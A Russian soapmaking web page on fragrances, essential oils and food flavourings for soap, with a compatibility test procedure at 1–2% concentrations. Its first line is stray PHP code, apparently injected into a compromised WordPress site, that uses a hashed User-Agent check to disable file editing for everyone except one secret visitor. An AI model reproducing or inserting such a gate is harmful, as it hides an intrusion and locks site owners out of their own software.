if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Ароматизаторы и отдушки | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Ароматизаторы и отдушки

Для придания мылу аромата используют отдушки, натуральные эфирные масла, либо пищевые ароматизаторы

Ингредиенты для мыла - ароматизаторы и отдушки Ингредиенты для мыла - ароматизаторы и отдушки

Для при­да­ния мылу аро­ма­та исполь­зу­ют отдуш­ки, нату­раль­ные эфир­ные мас­ла, либо пище­вые ароматизаторы.

Отдуш­ка - это ком­плекс­ная смесь орга­ни­че­ских веществ.
Отдуш­ка содер­жит мно­же­ство веществ с инди­ви­ду­аль­ным запа­хом и смесь этих запа­хов обес­пе­чи­ва­ет отдуш­ке инди­ви­ду­аль­ный аро­мат. Отдуш­ка так­же содер­жит дру­гие веще­ства, такие как:
— Рас­тво­ри­тель: добав­ля­ет­ся для обес­пе­че­ния хоро­шей рас­тво­ри­мо­сти отдуш­ки (см. ниже)
— Фик­са­тор: добав­ля­ет­ся для сни­же­ния лету­че­сти ком­по­нен­тов отдуш­ки и сохра­не­ния запа­ха на более дол­гое вре­мя (см. ниже)

Пра­виль­ный выбор отдушки
Опы­ты, про­ве­ден­ные в лабо­ра­то­рии ком­па­нии Stephenson, пока­за­ли, что боль­шин­ство отду­шек может успеш­но исполь­зо­вать­ся с осно­вой Crystall. Одна­ко, сле­ду­ет обра­тить вни­ма­ние на неко­то­рые моменты.
Про­из­во­ди­те­ли отду­шек про­из­во­дят раз­ные сме­си для раз­лич­ных при­ме­не­ний. Отдуш­ки для аро­мат­ных масел или све­чей долж­ны содер­жать вос­ки или рас­тво­ри­те­ли на мас­ля­ной осно­ве, и сни­ми могут воз­ник­нуть про­бле­мы при добав­ле­нии их в мыль­ную осно­ву или в воду. Подоб­ные отдуш­ки про­да­ют­ся как ингре­ди­ен­ты для Чистых Аро­ма­тов (Fine Fragrances) и содер­жат боль­шое коли­че­ство фик­са­то­ра. В каче­стве фик­са­то­ра могут исполь­зо­вать­ся вос­ки и они могут создать про­бле­мы при исполь­зо­ва­нии с мыла­ми. При выбо­ре отдуш­ки Вам необ­хо­ди­мо уточ­нить, что Вы соби­ра­е­тесь исполь­зо­вать ее для изго­тов­ле­ния мыла. Перед тем как Вы при­сту­пи­те к изго­тов­ле­нию цело­го брус­ка мыла, про­верь­те сов­ме­сти­мость мыла и отдуш­ки на малень­ком количестве.

Ука­за­ния по про­ве­де­нию теста на совместимость
Необ­хо­ди­мо про­ве­рить отдушку:
• На лег­кость и пол­но­ту растворения
• На ста­биль­ность в мыле при низ­ких температурах
• На окра­ши­ва­ние мыла
• На сов­ме­сти­мость в упа­ко­воч­ной пленкой.

Интен­сив­ность запа­ха мыла опре­де­ля­ет­ся кон­цен­тра­ци­ей отдуш­ки в мыле.Высокая кон­цен­тра­ция обес­пе­чит мылу интен­сив­ный запах, но может вызвать непред­ви­ден­ное изме­не­рие цве­та, сни­зить про­зрач­ность при низ­ких тем­пе­ра­ту­рах и при­ве­сти к пор­че упа­ков­ки. Кон­цен­тра­ция отдуш­ки 1% или мень­ше обыч­но обес­пе­чи­ва­ет при­ем­ле­мый уро­вень запа­ха и обес­пе­чи­ва­ет удо­вле­тво­ри­тель­ную ста­биль­ность. Кон­цен­тра­ция 2% и более может изме­нить цвет, может вызвать преж­де­вре­мен­ную пор­чу упа­ко­воч­ной плен­ки и ухуд­шить про­зрач­ность при низ­ких температурах.

Для про­ве­де­ния теста на сов­ме­сти­мость выпол­ни­те следующее:
• Возь­ми­те коли­че­ство Crystal доста­точ­ное для запол­не­ния 2 малень­ких форм.
• Осто­рож­но разо­грей­те осно­ву до 70°С и дожди­тесь пол­но­го расплавления.
• Пол­но­стью рас­плав­лен­ную осно­ву осту­ди­те до 65°С и добавь­те 1% отдуш­ки и пере­ме­шай­те до пол­но­го растворения.
• Раз­лить рав­ное коли­че­ство пар­фю­ми­ро­ван­но­го мыла в каж­дую из двух форм и убе­ди­тесь в том, что мыло про­зрач­ное и не содер­жит воз­душ­ных пузырьков.
• Оставь­те на ночь, затем извле­ки­те из фор­мы и плот­но завер­ни­те в пленку.
• Про­мар­ки­руй­те брус­ки мыла, ука­зав назва­ние отдуш­ки, номер и кон­цен­тра­цию 1%.
• Повто­ри­те выше­пе­ре­чис­лен­ное с кон­цен­тра­ци­ей отдуш­ки 1,5% и 2% и про­мар­ки­руй­те брус­ки ана­ло­гич­ным обра­зом с ука­за­ни­ем концентрации.
• Сде­лай­те еще 2 брус­ка мыла без добав­ле­ния отдуш­ки. (это кон­троль­ные образ­цы по кото­рым будет про­во­дить­ся сравнение).
• Поме­сти­те один из образ­цов в холо­диль­ник при тем­пе­ра­ту­ре око­ло 4°С.
• Оставь­те вто­рые экзем­пля­ры при ком­нат­ной температуре.
• Срав­ни­вай­те тести­ру­е­мые образ­цы с кон­троль­ны­ми еже­днев­но. Через 7 дней испы­та­ние закон­че­но. Если образ­цы, хра­нив­ши­е­ся в холо­диль­ни­ке, содер­жа­щие 2% отдуш­ки, такие же про­зрач­ные, как и образ­цы хра­нив­ши­е­ся при ком­нат­ной тем­пе­ра­ту­ре, то содер­жа­ние отдуш­ки 2% допу­сти­мо. Ана­ло­гич­но нуж­но про­ве­рить осталь­ные образ­цы и опре­де­лить мак­си­маль­но допу­сти­мый про­цент содер­жа­ния отдуш­ки. При срав­не­нии так­же сле­ду­ет обра­щать вни­ма­ние на цвет образцов.
• Одно­вре­мен­но сле­ду­ет про­ве­рить вли­я­ние содер­жа­ния отду­шек в раз­лич­ной кон­цен­тра­ции на упа­ко­воч­ную пленку.

Пище­вы­ми аро­ма­ти­за­то­ра­ми назы­ва­ют согла­со­ван­ные меж­ду собой хими­че­ские соеди­не­ния, обра­зу­ю­щие вкус и аро­мат, харак­тер­ные для кон­крет­но­го пище­во­го продукта.

Пище­вые аро­ма­ти­за­то­ры добав­ля­ют к пище­вым про­дук­там с целью:
ста­би­ли­за­ции вку­са и аро­ма­та пище­вых продуктов;
вос­ста­нов­ле­ния вку­са и аро­ма­та, утра­чен­ных в про­цес­се переработки;
уси­ле­ния нату­раль­ных вку­са и аромата;
при­да­ния вку­са и аро­ма­та без­вкус­ным продуктам.

Пище­вые аро­ма­ти­за­то­ры быва­ют (име­ют статус):
нату­раль­ны­ми;
иден­тич­ны­ми натуральным;
искусственными.

Нату­раль­ные пище­вые аро­ма­ти­за­то­ры извле­ка­ют­ся физи­че­ски­ми спо­со­ба­ми (прес­со­ва­ни­ем, экс­трак­ци­ей, дистил­ля­ци­ей, суб­ли­ма­ци­ей) из исход­ных мате­ри­а­лов рас­ти­тель­но­го или живот­но­го про­ис­хож­де­ния. Исполь­зо­ва­ние в про­из­вод­стве про­дук­тов пита­ния нату­раль­ных пище­вых аро­ма­ти­за­то­ров огра­ни­че­но по при­чине недо­ста­точ­но­сти и высо­кой сто­и­мо­сти при­род­но­го сырья. Кро­ме того, нату­раль­ные пище­вые аро­ма­ти­за­то­ры недо­ста­точ­но ста­биль­ны к рН, све­ту, тем­пе­ра­тур­ной обработке.

Иден­тич­ные нату­раль­ным пище­вые аро­ма­ти­за­то­ры, из-за отно­си­тель­ной доступ­но­сти, в насто­я­щее вре­мя полу­чи­ли наи­боль­шее рас­про­стра­не­ние. Иден­тич­ный нату­раль­ным пище­вые аро­ма­ти­за­то­ры по сво­е­му хими­че­ско­му стро­е­нию соот­вет­ству­ют при­род­ным, но полу­че­ны путем орга­ни­че­ско­го синтеза.

Искус­ствен­ные пище­вые аро­ма­ти­за­то­ры содер­жат в сво­ем соста­ве хотя бы одно веще­ство, не суще­ству­ю­щее в при­ро­де. Такие аро­ма­ти­за­то­ры наи­бо­лее деше­вы и стабильны.

Пище­вые аро­ма­ти­за­то­ры выпус­ка­ют­ся в виде жид­ко­стей или порош­ков. Каче­ство, стой­кость и область исполь­зо­ва­ния жид­ких аро­ма­ти­за­то­ров в боль­шой сте­пе­ни опре­де­ля­ет­ся рас­тво­ри­те­лем, кото­рый вхо­дит в их состав. Кон­цен­три­ро­ван­ные базы аро­ма­ти­за­то­ров чаще все­го рас­тво­ря­ют в эта­но­ле, про­пи­лен­гли­ко­ле, три­аце­тине, кото­рые при­да­ют им те или иные свой­ства. Для удоб­ства при­ме­не­ния аро­ма­ти­за­то­ры могут выпус­кать­ся в виде эмуль­сий, то есть быть окрашенными.
Порош­ко­вые пище­вые аро­ма­ти­за­то­ры чаще все­го полу­ча­ют мик­ро­кап­су­ли­ро­ва­ни­ем сме­ши­вая жид­кий аро­ма­ти­за­тор с носи­те­лем. Носи­те­ля­ми для аро­ма­ти­за­то­ров чаще все­го явля­ют­ся жела­тин, моди­фи­ци­ро­ван­ный крах­мал, гум­ми­а­ра­бик, декс­трин, сахар или соль.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!